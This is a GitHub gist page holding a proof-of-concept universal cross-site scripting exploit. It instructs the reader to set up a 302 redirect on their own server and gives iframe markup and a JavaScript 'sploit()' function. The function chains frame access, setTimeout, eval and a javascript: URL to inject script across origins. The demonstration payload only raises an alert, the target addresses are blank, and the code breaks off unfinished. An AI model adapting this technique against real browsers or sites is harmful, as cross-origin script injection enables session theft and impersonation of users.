Skip to content

Instantly share code, notes, and snippets.

/gist:f0b1481f0ae5424454f3 Secret

Created Feb 3, 2015
What would you like to do?
// From
// Sample: UXSS against
// Make the URI /1 on your server respond with the HTTP redirect:
< HTTP/1.1 302 Found
< Content-Type: text/html;charset=utf-8
< Location:
// XSS into
<iframe id=i name=i src="/1"></iframe><br>
<iframe src="" onload='sploit()'></iframe><br>
function sploit(){
var payload = 'alert(location.href);'
frames[0].setTimeout("alert(eval('x=top.frames[1];d=new Date;while((new Date)-d<3000)alert(\\'An error occurred.\\');x.location=\\'javascript:%22%3Cscript%3E"+encodeURIComponent(payload)+"%3C/script%3E%22\\';'))",1);
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.